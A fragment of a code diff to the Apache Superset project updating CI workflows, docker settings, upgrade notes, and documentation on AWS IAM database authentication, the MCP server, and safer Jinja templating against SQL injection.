||||
fi
|
||||
|
||||
env:
|
||||
GSHEET_KEY: ${{ (secrets.GSHEET_KEY != '' ) || '' }}
|
||||
process-and-upload:
|
||||
needs: config
|
||||
if: needs.config.outputs.has-secrets
|
||||
@@ -30,10 +32,10 @@ jobs:
|
||||
name: Generate Reports
|
||||
steps:
|
||||
- name: Checkout Repository
|
||||
uses: actions/checkout@v6
|
||||
uses: actions/checkout@de0fac2e4500dabe0009e67214ff5f5447ce83dd # v6
|
||||
|
||||
- name: Set up Node.js
|
||||
uses: actions/setup-node@v6
|
||||
uses: actions/setup-node@48b55a011bda9f5d6aeb4c2d9c7362e8dae4041e # v6
|
||||
with:
|
||||
node-version-file: './superset-frontend/.nvmrc'
|
||||
|
||||
|
||||
2
.gitignore
vendored
2
.gitignore
vendored
@@ -62,6 +62,7 @@ rat-results.txt
|
||||
superset/app/
|
||||
superset-websocket/config.json
|
||||
.direnv
|
||||
*.log
|
||||
|
||||
# Node.js, webpack artifacts, storybook
|
||||
*.entry.js
|
||||
@@ -133,6 +134,7 @@ CLAUDE.local.md
|
||||
PROJECT.md
|
||||
.aider*
|
||||
.claude_rc*
|
||||
.claude/settings.local.json
|
||||
.env.local
|
||||
oxc-custom-build/
|
||||
*.code-workspace
|
||||
|
||||
@@ -458,7 +458,7 @@ cd ../
|
||||
sed -i '' "s/version_string = .*/version_string = \"$SUPERSET_VERSION\"/" setup.py
|
||||
|
||||
# build the python distribution
|
||||
python setup.py sdist
|
||||
python -m build
|
||||
```
|
||||
|
||||
Publish to PyPI
|
||||
|
||||
@@ -287,6 +287,11 @@ categories:
|
||||
url: https://www.gfk.com/home
|
||||
contributors: ["@mherr"]
|
||||
|
||||
- name: Hifadih Business & Technology
|
||||
url: https://hifadih.net/en
|
||||
logo: hifadih.png
|
||||
contributors: ["@saintLaurent00"]
|
||||
|
||||
# Logo approved by @anmol-hpe on behalf of HPE
|
||||
- name: HPE
|
||||
url: https://www.hpe.com/in/en/home.html
|
||||
|
||||
26
UPDATING.md
26
UPDATING.md
@@ -24,6 +24,28 @@ assists people when migrating to a new version.
|
||||
|
||||
## Next
|
||||
|
||||
### Granular Export Controls
|
||||
|
||||
A new feature flag `GRANULAR_EXPORT_CONTROLS` introduces three fine-grained permissions that replace the legacy `can_csv` permission:
|
||||
|
||||
| Permission | Controls |
|
||||
|---|---|
|
||||
| `can_export_data` | CSV, Excel, JSON exports |
|
||||
| `can_export_image` | Screenshot/PDF exports |
|
||||
| `can_copy_clipboard` | Copy-to-clipboard operations |
|
||||
|
||||
When the feature flag is enabled, these permissions are enforced on both the frontend (disabled buttons with tooltips) and backend (403 responses from API endpoints). When disabled, legacy `can_csv` behavior is preserved.
|
||||
|
||||
**Migration behavior:** All three new permissions are granted to every role that currently has `can_csv`, preserving existing access. Admins can then selectively revoke individual export permissions from specific roles as needed.
|
||||
|
||||
### Deck.gl MapBox viewport and opacity controls are functional
|
||||
|
||||
The Deck.gl MapBox chart's **Opacity**, **Default longitude**, **Default latitude**, and **Zoom** controls were previously non-functional — changing them had no effect on the rendered map. These controls are now wired up correctly.
|
||||
|
||||
**Behavior change for existing charts:** Previously, the viewport controls had hard-coded default values (`-122.405293`, `37.772123`, zoom `11` — San Francisco) that were stored in each chart's `form_data` but never applied. The map always used `fitBounds` to center on the data. With this fix, those stored values are now respected, which means existing MapBox charts may open centered on the old default coordinates instead of fitting to data bounds.
|
||||
|
||||
**To restore fit-to-data behavior:** Open the chart in Explore, clear the **Default longitude**, **Default latitude**, and **Zoom** fields in the Viewport section, and re-save the chart.
|
||||
|
||||
### ClickHouse minimum driver version bump
|
||||
|
||||
The minimum required version of `clickhouse-connect` has been raised to `>=0.13.0`. If you are using the ClickHouse connector, please upgrade your `clickhouse-connect` package. The `_mutate_label` workaround that appended hash suffixes to column aliases has also been removed, as it is no longer needed with modern versions of the driver.
|
||||
@@ -300,13 +322,13 @@ Note: Pillow is now a required dependency (previously optional) to support image
|
||||
There's a migration added that can potentially affect a significant number of existing charts.
|
||||
- [32317](https://github.com/apache/superset/pull/32317) The horizontal filter bar feature is now out of testing/beta development and its feature flag `HORIZONTAL_FILTER_BAR` has been removed.
|
||||
- [31590](https://github.com/apache/superset/pull/31590) Marks the begining of intricate work around supporting dynamic Theming, and breaks support for [THEME_OVERRIDES](https://github.com/apache/superset/blob/732de4ac7fae88e29b7f123b6cbb2d7cd411b0e4/superset/config.py#L671) in favor of a new theming system based on AntD V5. Likely this will be in disrepair until settling over the 5.x lifecycle.
|
||||
- [32432](https://github.com/apache/superset/pull/31260) Moves the List Roles FAB view to the frontend and requires `FAB_ADD_SECURITY_API` to be enabled in the configuration and `superset init` to be executed.
|
||||
- [32432](https://github.com/apache/superset/pull/32432) Moves the List Roles FAB view to the frontend and requires `FAB_ADD_SECURITY_API` to be enabled in the configuration and `superset init` to be executed.
|
||||
- [34319](https://github.com/apache/superset/pull/34319) Drill to Detail and Drill By is now supported in Embedded mode, and also with the `DASHBOARD_RBAC` FF. If you don't want to expose these features in Embedded / `DASHBOARD_RBAC`, make sure the roles used for Embedded / `DASHBOARD_RBAC`don't have the required permissions to perform D2D actions.
|
||||
|
||||
## 5.0.0
|
||||
|
||||
- [31976](https://github.com/apache/superset/pull/31976) Removed the `DISABLE_LEGACY_DATASOURCE_EDITOR` feature flag. The previous value of the feature flag was `True` and now the feature is permanently removed.
|
||||
- [31959](https://github.com/apache/superset/pull/32000) Removes CSV_UPLOAD_MAX_SIZE config, use your web server to control file upload size.
|
||||
- [32000](https://github.com/apache/superset/pull/32000) Removes CSV_UPLOAD_MAX_SIZE config, use your web server to control file upload size.
|
||||
- [31959](https://github.com/apache/superset/pull/31959) Removes the following endpoints from data uploads: `/api/v1/database/<id>/<file type>_upload` and `/api/v1/database/<file type>_metadata`, in favour of new one (Details on the PR). And simplifies permissions.
|
||||
- [31844](https://github.com/apache/superset/pull/31844) The `ALERT_REPORTS_EXECUTE_AS` and `THUMBNAILS_EXECUTE_AS` config parameters have been renamed to `ALERT_REPORTS_EXECUTORS` and `THUMBNAILS_EXECUTORS` respectively. A new config flag `CACHE_WARMUP_EXECUTORS` has also been introduced to be able to control which user is used to execute cache warmup tasks. Finally, the config flag `THUMBNAILS_SELENIUM_USER` has been removed. To use a fixed executor for async tasks, use the new `FixedExecutor` class. See the config and docs for more info on setting up different executor profiles.
|
||||
- [31894](https://github.com/apache/superset/pull/31894) Domain sharding is deprecated in favor of HTTP2. The `SUPERSET_WEBSERVER_DOMAINS` configuration will be removed in the next major version (6.0)
|
||||
|
||||
@@ -115,6 +115,10 @@ services:
|
||||
DATABASE_HOST: db-light
|
||||
DATABASE_DB: superset_light
|
||||
POSTGRES_DB: superset_light
|
||||
EXAMPLES_HOST: db-light
|
||||
EXAMPLES_DB: superset_light
|
||||
EXAMPLES_USER: superset
|
||||
EXAMPLES_PASSWORD: superset
|
||||
SUPERSET_CONFIG_PATH: /app/docker/pythonpath_dev/superset_config_docker_light.py
|
||||
GITHUB_HEAD_REF: ${GITHUB_HEAD_REF:-}
|
||||
GITHUB_SHA: ${GITHUB_SHA:-}
|
||||
@@ -137,6 +141,10 @@ services:
|
||||
DATABASE_HOST: db-light
|
||||
DATABASE_DB: superset_light
|
||||
POSTGRES_DB: superset_light
|
||||
EXAMPLES_HOST: db-light
|
||||
EXAMPLES_DB: superset_light
|
||||
EXAMPLES_USER: superset
|
||||
EXAMPLES_PASSWORD: superset
|
||||
SUPERSET_CONFIG_PATH: /app/docker/pythonpath_dev/superset_config_docker_light.py
|
||||
healthcheck:
|
||||
disable: true
|
||||
@@ -157,6 +165,7 @@ services:
|
||||
BUILD_SUPERSET_FRONTEND_IN_DOCKER: true
|
||||
NPM_RUN_PRUNE: false
|
||||
SCARF_ANALYTICS: "${SCARF_ANALYTICS:-}"
|
||||
DISABLE_TS_CHECKER: "${DISABLE_TS_CHECKER:-true}"
|
||||
# configuring the dev-server to use the host.docker.internal to connect to the backend
|
||||
superset: "http://superset-light:8088"
|
||||
# Webpack dev server must bind to 0.0.0.0 to be accessible from outside the container
|
||||
|
||||
@@ -80,7 +80,7 @@ case "${1}" in
|
||||
;;
|
||||
app)
|
||||
echo "Starting web app (using development server)..."
|
||||
flask run -p $PORT --reload --debugger --without-threads --host=0.0.0.0 --exclude-patterns "*/node_modules/*:*/.venv/*:*/build/*:*/__pycache__/*"
|
||||
flask run -p $PORT --reload --debugger --host=0.0.0.0 --exclude-patterns "*/node_modules/*:*/.venv/*:*/build/*:*/__pycache__/*:*/superset-frontend/*"
|
||||
;;
|
||||
app-gunicorn)
|
||||
echo "Starting web app..."
|
||||
|
||||
162
docs/admin_docs/configuration/aws-iam.mdx
Normal file
162
docs/admin_docs/configuration/aws-iam.mdx
Normal file
@@ -0,0 +1,162 @@
|
||||
{/*
|
||||
Licensed to the Apache Software Foundation (ASF) under one
|
||||
or more contributor license agreements. See the NOTICE file
|
||||
distributed with this work for additional information
|
||||
regarding copyright ownership. The ASF licenses this file
|
||||
to you under the Apache License, Version 2.0 (the
|
||||
"License"); you may not use this file except in compliance
|
||||
with the License. You may obtain a copy of the License at
|
||||
|
||||
http://www.apache.org/licenses/LICENSE-2.0
|
||||
|
||||
Unless required by applicable law or agreed to in writing,
|
||||
software distributed under the License is distributed on an
|
||||
"AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
|
||||
KIND, either express or implied. See the License for the
|
||||
specific language governing permissions and limitations
|
||||
under the License.
|
||||
*/}
|
||||
|
||||
---
|
||||
title: AWS IAM Authentication
|
||||
sidebar_label: AWS IAM Authentication
|
||||
sidebar_position: 15
|
||||
---
|
||||
|
||||
# AWS IAM Authentication for AWS Databases
|
||||
|
||||
Superset supports IAM-based authentication for **Amazon Aurora** (PostgreSQL and MySQL) and **Amazon Redshift**. IAM auth eliminates the need for database passwords — Superset generates a short-lived auth token using temporary AWS credentials instead.
|
||||
|
||||
Cross-account IAM role assumption via STS `AssumeRole` is supported, allowing a Superset deployment in one AWS account to connect to databases in a different account.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Enable the `AWS_DATABASE_IAM_AUTH` feature flag in `superset_config.py`. IAM authentication is gated behind this flag; if it is disabled, connections using `aws_iam` fail with *"AWS IAM database authentication is not enabled."*
|
||||
```python
|
||||
FEATURE_FLAGS = {
|
||||
"AWS_DATABASE_IAM_AUTH": True,
|
||||
}
|
||||
```
|
||||
- `boto3` must be installed in your Superset environment:
|
||||
```bash
|
||||
pip install boto3
|
||||
```
|
||||
- The Superset server's IAM role (or static credentials) must have permission to call `sts:AssumeRole` (for cross-account) or the same-account permissions for the target service:
|
||||
- **Aurora (RDS)**: `rds-db:connect`
|
||||
- **Redshift provisioned**: `redshift:GetClusterCredentials`
|
||||
- **Redshift Serverless**: `redshift-serverless:GetCredentials` and `redshift-serverless:GetWorkgroup`
|
||||
- SSL must be enabled on the Aurora / Redshift endpoint (required for IAM token auth).
|
||||
|
||||
## Configuration
|
||||
|
||||
IAM authentication is configured via the **encrypted_extra** field of the database connection. Access this field in the **Advanced** → **Security** section of the database connection form, under **Secure Extra**.
|
||||
|
||||
### Aurora PostgreSQL or Aurora MySQL
|
||||
|
||||
```json
|
||||
{
|
||||
"aws_iam": {
|
||||
"enabled": true,
|
||||
"role_arn": "arn:aws:iam::222222222222:role/SupersetDatabaseAccess",
|
||||
"external_id": "superset-prod-12345",
|
||||
"region": "us-east-1",
|
||||
"db_username": "superset_iam_user",
|
||||
"session_duration": 3600
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
| Field | Required | Description |
|
||||
|-------|----------|-------------|
|
||||
| `enabled` | Yes | Set to `true` to activate IAM auth |
|
||||
| `role_arn` | No | ARN of the cross-account IAM role to assume via STS. Omit for same-account auth |
|
||||
| `external_id` | No | External ID for the STS `AssumeRole` call, if required by the target role's trust policy |
|
||||
| `region` | Yes | AWS region of the database cluster |
|
||||
| `db_username` | Yes | The database username associated with the IAM identity |
|
||||
| `session_duration` | No | STS session duration in seconds (default: `3600`) |
|
||||
|
||||
### Redshift (Serverless)
|
||||
|
||||
```json
|
||||
{
|
||||
"aws_iam": {
|
||||
"enabled": true,
|
||||
"role_arn": "arn:aws:iam::222222222222:role/SupersetRedshiftAccess",
|
||||
"region": "us-east-1",
|
||||
"workgroup_name": "my-workgroup",
|
||||
"db_name": "dev"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
### Redshift (Provisioned Cluster)
|
||||
|
||||
```json
|
||||
{
|
||||
"aws_iam": {
|
||||
"enabled": true,
|
||||
"role_arn": "arn:aws:iam::222222222222:role/SupersetRedshiftAccess",
|
||||
"region": "us-east-1",
|
||||
"cluster_identifier": "my-cluster",
|
||||
"db_username": "superset_iam_user",
|
||||
"db_name": "dev"
|
||||
}
|
||||
}
|
||||
```
|
||||
|
||||
## Cross-Account IAM Setup
|
||||
|
||||
To connect to a database in Account B from a Superset deployment in Account A:
|
||||
|
||||
**1. In Account B — create a database-access role:**
|
||||
|
||||
```json
|
||||
{
|
||||
"Version": "2012-10-17",
|
||||
"Statement": [
|
||||
{
|
||||
"Effect": "Allow",
|
||||
"Action": ["rds-db:connect"],
|
||||
"Resource": "arn:aws:rds-db:us-east-1:222222222222:dbuser/db-XXXXXXXXXXXX/superset_iam_user"
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
**Trust policy** (allows Account A's Superset role to assume it):
|
||||
|
||||
```json
|
||||
{
|
||||
"Version": "2012-10-17",
|
||||
"Statement": [
|
||||
{
|
||||
"Effect": "Allow",
|
||||
"Principal": {
|
||||
"AWS": "arn:aws:iam::111111111111:role/SupersetInstanceRole"
|
||||
},
|
||||
"Action": "sts:AssumeRole",
|
||||
"Condition": {
|
||||
"StringEquals": {
|
||||
"sts:ExternalId": "superset-prod-12345"
|
||||
}
|
||||
}
|
||||
}
|
||||
]
|
||||
}
|
||||
```
|
||||
|
||||
**2. In Account A — grant Superset's role permission to assume the Account B role:**
|
||||
|
||||
```json
|
||||
{
|
||||
"Effect": "Allow",
|
||||
"Action": "sts:AssumeRole",
|
||||
"Resource": "arn:aws:iam::222222222222:role/SupersetDatabaseAccess"
|
||||
}
|
||||
```
|
||||
|
||||
**3. Configure the database connection in Superset** using the `role_arn` and `external_id` from the trust policy (as shown in the configuration example above).
|
||||
|
||||
## Credential Caching
|
||||
|
||||
STS credentials are cached in memory keyed by `(role_arn, region, external_id)` with a 10-minute TTL. This reduces the number of STS API calls when multiple queries are executed with the same connection. Tokens are refreshed automatically before expiry.
|
||||
@@ -109,6 +109,14 @@ SECRET_KEY = 'YOUR_OWN_RANDOM_GENERATED_SECRET_KEY'
|
||||
|
||||
You can generate a strong secure key with `openssl rand -base64 42`.
|
||||
|
||||
Alternatively, you can set the secret key using `SUPERSET_SECRET_KEY` environment variable:
|
||||
|
||||
On a Unix-based system, such as Linux or macOS, you can do so by running the following command in your terminal:
|
||||
|
||||
```bash
|
||||
export SUPERSET_SECRET_KEY=$(openssl rand -base64 42)
|
||||
```
|
||||
|
||||
:::caution Use a strong secret key
|
||||
This key will be used for securely signing session cookies and encrypting sensitive information stored in Superset's application metadata database.
|
||||
Your deployment must use a complex, unique key.
|
||||
|
||||
@@ -10,6 +10,10 @@ version: 1
|
||||
The superset cli allows you to import and export datasources from and to YAML. Datasources include
|
||||
databases. The data is expected to be organized in the following hierarchy:
|
||||
|
||||
:::info
|
||||
Superset's ZIP-based import/export also covers **dashboards**, **charts**, and **saved queries**, exercised through the UI and REST API. The [Dashboard Import Overwrite Behavior](#dashboard-import-overwrite-behavior) and [UUIDs in API Responses](#uuids-in-api-responses) sections below document the behavior shared across all asset types.
|
||||
:::
|
||||
|
||||
```text
|
||||
├──databases
|
||||
| ├──database_1
|
||||
@@ -75,6 +79,29 @@ The optional username flag **-u** sets the user used for the datasource import.
|
||||
superset import_datasources -p <path / filename> -u 'admin'
|
||||
```
|
||||
|
||||
## Dashboard Import Overwrite Behavior
|
||||
|
||||
When importing a dashboard ZIP with the **overwrite** option enabled, any existing charts that are part of the dashboard are **replaced** rather than duplicated. This applies to:
|
||||
|
||||
- Charts whose UUID matches a chart already present in the target instance
|
||||
- The full chart configuration (query, visualization type, columns, metrics) is replaced by the imported version
|
||||
|
||||
If you import without the overwrite flag, existing charts with conflicting UUIDs are left unchanged and the import skips those objects. Use overwrite when you want to push a fully updated dashboard (including chart definitions) from a development or staging environment to production.
|
||||
|
||||
## UUIDs in API Responses
|
||||
|
||||
The REST API POST endpoints for **datasets**, **charts**, and **dashboards** include the auto-generated `uuid` field in the response body:
|
||||
|
||||
```json
|
||||
{
|
||||
"id": 42,
|
||||
"uuid": "b8a8d5c3-1234-4abc-8def-0123456789ab",
|
||||
...
|
||||
}
|
||||
```
|
||||
|
||||
UUIDs remain stable across import/export cycles and can be used for cross-environment workflows — for example, recording a UUID when creating a chart in development and using it to identify the matching chart after importing into production.
|
||||
|
||||
## Legacy Importing Datasources
|
||||
|
||||
### From older versions of Superset to current version
|
||||
|
||||
@@ -1,7 +1,7 @@
|
||||
---
|
||||
title: MCP Server Deployment & Authentication
|
||||
hide_title: true
|
||||
sidebar_position: 9
|
||||
sidebar_position: 14
|
||||
version: 1
|
||||
---
|
||||
|
||||
@@ -30,6 +30,10 @@ Superset includes a built-in [Model Context Protocol (MCP)](https://modelcontext
|
||||
|
||||
This guide covers how to run, secure, and deploy the MCP server.
|
||||
|
||||
:::tip Looking for user docs?
|
||||
See **[Using AI with Superset](/user-docs/using-superset/using-ai-with-superset)** for a guide on what AI can do with Superset and how to connect your AI client.
|
||||
:::
|
||||
|
||||
```mermaid
|
||||
flowchart LR
|
||||
A["AI Client<br/>(Claude, ChatGPT, etc.)"] -- "MCP protocol<br/>(HTTP + JSON-RPC)" --> B["MCP Server<br/>(:5008/mcp)"]
|
||||
@@ -497,6 +501,7 @@ All MCP settings go in `superset_config.py`. Defaults are defined in `superset/m
|
||||
| `MCP_SERVICE_URL` | `None` | Public base URL for MCP-generated links (set this when behind a reverse proxy) |
|
||||
| `MCP_DEBUG` | `False` | Enable debug logging |
|
||||
| `MCP_DEV_USERNAME` | -- | Superset username for development mode (no auth) |
|
||||
| `MCP_PARSE_REQUEST_ENABLED` | `True` | Pre-parse MCP tool inputs from JSON strings into objects. Set to `False` for clients (Claude Desktop, LangChain) that do not double-serialize arguments — this produces cleaner tool schemas for those clients |
|
||||
|
||||
### Authentication
|
||||
|
||||
@@ -660,6 +665,32 @@ MCP_CSRF_CONFIG = {
|
||||
|
||||
---
|
||||
|
||||
## Audit Events
|
||||
|
||||
All MCP tool calls are logged to Superset's event logger, the same system used by the web UI (viewable at **Settings → Action Log**). Each event captures:
|
||||
|
||||
- **Action**: `mcp.<tool_name>.<phase>` (e.g., `mcp.list_databases.query`)
|
||||
- **User**: the resolved Superset username from the JWT or dev config
|
||||
- **Timestamp**: when the operation ran
|
||||
|
||||
This means MCP activity is auditable alongside normal user activity. No additional configuration is required — logging is on by default whenever the event logger is enabled in your Superset deployment.
|
||||
|
||||
## Tool Pagination
|
||||
|
||||
MCP list tools (`list_datasets`, `list_charts`, `list_dashboards`, `list_databases`) use **offset pagination** via `page` (1-based) and `page_size` parameters. Responses include `page`, `page_size`, `total_count`, `total_pages`, `has_previous`, and `has_next`. To iterate through all results:
|
||||
|
||||
```python
|
||||
# Example: fetch all charts across pages
|
||||
all_charts = []
|
||||
page = 1
|
||||
while True:
|
||||
result = mcp.list_charts(page=page, page_size=50)
|
||||
all_charts.extend(result["charts"])
|
||||
if not result.get("has_next"):
|
||||
break
|
||||
page += 1
|
||||
```
|
||||
|
||||
## Security Best Practices
|
||||
|
||||
- **Use TLS** for all production MCP endpoints -- place the server behind a reverse proxy with HTTPS
|
||||
@@ -668,12 +699,13 @@ MCP_CSRF_CONFIG = {
|
||||
- **Secrets management** -- Store `MCP_JWT_SECRET`, database credentials, and API keys in environment variables or a secrets manager, never in config files committed to version control
|
||||
- **Scoped tokens** -- Use `MCP_REQUIRED_SCOPES` to limit what operations a token can perform
|
||||
- **Network isolation** -- In Kubernetes, restrict MCP pod network policies to only allow traffic from your AI client endpoints
|
||||
- Review the **[Security documentation](./security)** for additional extension security guidance
|
||||
- Review the **[Security documentation](/developer-docs/extensions/security)** for additional extension security guidance
|
||||
|
||||
---
|
||||
|
||||
## Next Steps
|
||||
|
||||
- **[MCP Integration](./mcp)** -- Build custom MCP tools and prompts via Superset extensions
|
||||
- **[Security](./security)** -- Security best practices for extensions
|
||||
- **[Deployment](./deployment)** -- Package and deploy Superset extensions
|
||||
- **[Using AI with Superset](/user-docs/using-superset/using-ai-with-superset)** -- What AI can do with Superset and how to get started
|
||||
- **[MCP Integration](/developer-docs/extensions/mcp)** -- Build custom MCP tools and prompts via Superset extensions
|
||||
- **[Security](/developer-docs/extensions/security)** -- Security best practices for extensions
|
||||
- **[Deployment](/developer-docs/extensions/deployment)** -- Package and deploy Superset extensions
|
||||
@@ -22,6 +22,15 @@ While powerful, this feature executes template code on the server. Within the Su
|
||||
|
||||
If you grant these permissions to untrusted users, this feature can be exploited as a **Server-Side Template Injection (SSTI)** vulnerability. Do not enable `ENABLE_TEMPLATE_PROCESSING` unless you fully understand and accept the associated security risks.
|
||||
|
||||
Additionally:
|
||||
|
||||
- The `url_param()` macro allows URL parameters to influence the rendered SQL. Always validate or restrict `url_param()` values in your templates rather than interpolating them directly.
|
||||
- `filter.get('val')` returns raw filter values without escaping. Use the safe helpers described below (`|where_in`, `| replace("'", "''")`) rather than concatenating values directly into SQL strings.
|
||||
|
||||
:::
|
||||
|
||||
:::tip
|
||||
`ENABLE_TEMPLATE_PROCESSING` defaults to `False`. Only enable it if your deployment requires Jinja templates and all users with dataset/chart edit access are administrators or fully trusted internal users.
|
||||
:::
|
||||
|
||||
When templating is enabled, python code can be embedded in virtual datasets and
|
||||
@@ -324,6 +333,16 @@ cache hit in the future and Superset can retrieve cached data.
|
||||
The `{{ url_param('custom_variable') }}` macro lets you define arbitrary URL
|
||||
parameters and reference them in your SQL code.
|
||||
|
||||
:::warning
|
||||
Always treat `url_param()` values as untrusted input. Escaping behaviour varies by context and configuration, so do not rely on it. Restrict values to an explicit allowlist before using them in SQL:
|
||||
|
||||
```sql
|
||||
{% set cc = url_param('countrycode') %}
|
||||
{% if cc not in ('US', 'ES', 'FR') %}{% set cc = 'US' %}{% endif %}
|
||||
WHERE country_code = '{{ cc }}'
|
||||
```
|
||||
:::
|
||||
|
||||
Here's a concrete example:
|
||||
|
||||
- You write the following query in SQL Lab:
|
||||
@@ -398,6 +417,16 @@ This is useful if:
|
||||
- You want to handle generating custom SQL conditions for a filter
|
||||
- You want to have the ability to filter inside the main query for speed purposes
|
||||
|
||||
:::warning
|
||||
`filter.get('val')` returns the raw filter value without escaping. For multi-value filters, use the `|where_in` Jinja filter, which handles quoting safely. For single-value operators like `LIKE`, escape single quotes before interpolating:
|
||||
|
||||
```sql
|
||||
{%- if filter.get('op') == 'LIKE' -%}
|
||||
AND full_name LIKE '{{ filter.get('val') | replace("'", "''") }}'
|
||||
{%- endif -%}
|
||||
```
|
||||
:::
|
||||
|
||||
Here's a concrete example:
|
||||
|
||||
```sql
|
||||
@@ -424,7 +453,7 @@ Here's a concrete example:
|
||||
|
||||
{%- if filter.get('op') == 'LIKE' -%}
|
||||
AND
|
||||
full_name LIKE {{ "'" + filter.get('val') + "'" }}
|
||||
full_name LIKE '{{ filter.get('val') | replace("'", "''") }}'
|
||||
{%- endif -%}
|
||||
|
||||
{%- endfor -%}
|
||||
|
||||
@@ -24,6 +24,14 @@ A table with the permissions for these roles can be found at [/RESOURCES/STANDAR
|
||||
Admins have all possible rights, including granting or revoking rights from other
|
||||
users and altering other people’s slices and dashboards.
|
||||
|
||||
>#### Threat Model and Privilege Boundaries: The Admin Role
|
||||
>
|
||||
>Apache Superset is built with a granular permission model where users assigned the Admin role are considered fully trusted. Admins possess complete control over the application's configuration, UI rendering, and access controls.
|
||||
>
|
||||
>Consequently, actions performed by an Admin that alter the application's behavior or presentation—such as injecting custom CSS, modifying Jinja templates, or altering security flags—are intended administrative capabilities by design.
|
||||
>
|
||||
>In accordance with MITRE CNA Rule 4.1, a vulnerability must represent a violation of an explicit security policy. Because the Admin role is defined as a trusted operational boundary, actions executed with Admin privileges do not cross a security perimeter. Therefore, exploit vectors that strictly require Admin access are not classified as security vulnerabilities and are ineligible for CVE assignment.
|
||||
|
||||
### Alpha
|
||||
|
||||
Alpha users have access to all data sources, but they cannot grant or revoke access
|
||||
|
||||
@@ -47,10 +47,10 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `GET` | [Get the CSRF token](./api/get-the-csrf-token) | `/api/v1/security/csrf_token/` |
|
||||
| `POST` | [Get a guest token](./api/get-a-guest-token) | `/api/v1/security/guest_token/` |
|
||||
| `POST` | [Create security login](./api/create-security-login) | `/api/v1/security/login` |
|
||||
| `POST` | [Create security refresh](./api/create-security-refresh) | `/api/v1/security/refresh` |
|
||||
| `GET` | [Get the CSRF token](/developer-docs/api/get-the-csrf-token) | `/api/v1/security/csrf_token/` |
|
||||
| `POST` | [Get a guest token](/developer-docs/api/get-a-guest-token) | `/api/v1/security/guest_token/` |
|
||||
| `POST` | [Create security login](/developer-docs/api/create-security-login) | `/api/v1/security/login` |
|
||||
| `POST` | [Create security refresh](/developer-docs/api/create-security-refresh) | `/api/v1/security/refresh` |
|
||||
|
||||
---
|
||||
|
||||
@@ -63,32 +63,32 @@ curl -H "Authorization: Bearer YOUR_ACCESS_TOKEN" \
|
||||
|
||||
| Method | Endpoint | Description |
|
||||
|--------|----------|-------------|
|
||||
| `DELETE` | [Bulk delete dashboards](./api/bulk-delete-dashboards) | `/api/v1/dashboard/` |
|
||||
| `GET` | [Get a list of dashboards](./api/get-a-list-of-dashboards) | `/api/v1/dashboard/` |
|
||||
| `POST` | [Create a new dashboard](./api/create-a-new-dashboard) | `/api/v1/dashboard/` |
|
||||
| `GET` | [Get metadata information about this API resource (dashboard--info)](./api/get-metadata-information-about-this-api-resource-dashboard-info) | `/api/v1/dashboard/_info` |
|
||||
| `GET` | [Get a dashboard detail information](./api/get-a-dashboard-detail-information) | `/api/v1/dashboard/{id_or_slug}` |
|
||||
| `GET` | [Get a dashboard's chart definitions.](./api/get-a-dashboard-s-chart-definitions) | `/api/v1/dashboard/{id_or_slug}/charts` |
|
||||
| `POST` | [Create a copy of an existing dashboard](./api/create-a-copy-of-an-existing-dashboard) | `/api/v1/dashboard/{id_or_slug}/copy/` |
|
||||
| `GET` | [Get dashboard's datasets](./api/get-dashboard-s-datasets) | `/api/v1/dashboard/{id_or_slug}/datasets` |
|
||||
| `DELETE` | [Delete a dashboard's embedded configuration](./api/delete-a-dashboard-s-embedded-configuration) | `/api/v1/dashboard/{id_or_slug}/embedded` |
|
||||
| `GET` | [Get the dashboard's embedded configuration](./api/get-the-dashboard-s-embedded-configuration) | `/api/v1/dashboard/{id_or_slug}/embedded` |
|
||||
| `POST` | [Set a dashboard's embedded configuration](./api/set-a-dashboard-s-embedded-configuration) | `/api/v1/dashboard/{id_or_slug}/embedded` |
|
||||
| `PUT` | [Update dashboard by id_or_slug embedded](./api/update-dashboard-by-id-or-slug-embedded) | `/api/v1/dashboard/{id_or_slug}/embedded` |
|
||||
| `GET` | [Get dashboard's tabs](./api/get-dashboard-s-tabs) | `/api/v1/dashboard/{id_or_slug}/tabs` |
|
||||
| `DELETE` | [Delete a dashboard](./api/delete-a-dashboard) | `/api/v1/dashboard/{pk}` |
|
||||
| `PUT` | [Update a dashboard](./api/update-a-dashboard) | `/api/v1/dashboard/{pk}` |
|
||||
| `POST` | [Compute and cache a screenshot (dashboard-pk-cache-dashboard-screenshot)](./api/compute-and-cache-a-screenshot-dashboard-pk-cache-dashboard-screenshot) | `/api/v1/dashboard/{pk}/cache_dashboard_screenshot/` |
|
||||
| `PUT` | [Update colors configuration for a dashboard.](./api/update-colors-configuration-for-a-dashboard) | `/api/v1/dashboard/{pk}/colors` |
|
||||
| `DELETE` | [Remove the dashboard from the user favorite list](./api/remove-the-dashboard-from-the-user-favorite-list) | `/api/v1/dashboard/{pk}/favorites/` |
|
||||
| `POST` | [Mark the dashboard as favorite for the current user](./api/mark-the-dashboard-as-favorite-for-the-current-user) | `/api/v1/dashboard/{pk}/favorites/` |
|
||||
| `PUT` | [Update native filters configuration for a dashboard.](./api/update-native-filters-configuration-for-a-dashboard) | `/api/v1/dashboard/{pk}/filters` |
|
||||
| `GET` | [Get a computed screenshot from cache (dashboard-pk-screenshot-digest)](./api/get-a-computed-screenshot-from-cache-dashboard-pk-screenshot-digest) | `/api/v1/dashboard/{pk}/screenshot/{digest}/` |
|
||||
| `GET` | [Get dashboard's thumbnail](./api/get-dashboard-s-thumbnail) | `/api/v1/dashboard/{pk}/thumbnail/{digest}/` |
|
||||
| `GET` | [Download multiple dashboards as YAML files](./api/download-multiple-dashboards-as-yaml-files) | `/api/v1/dashboard/export/` |
|
||||
| `GET` | [Check favorited dashboards for current user](./api/check-favorited-dashboards-for-current-user) | `/api/v1/dashboard/favorite_status/` |
|
||||
| `POST` | [Import dashboard(s) with associated charts/datasets/databases](./api/import-dashboard-s-with-associated-charts-datasets-databases) | `/api/v1/dashboard/import/` |
|
||||
| `GET` | [Get related fields data (dashboard-related-column-name)](./api/get-related-fields-data-dashboard-related-column-name) | `/api/v1/dashboard/related/{column_name}` |
|
||||
| `DELETE` | [Bulk delete dashboards](/developer-docs/api/bulk-delete-dashboards) | `/api/v1/dashboard/` |
|
||||
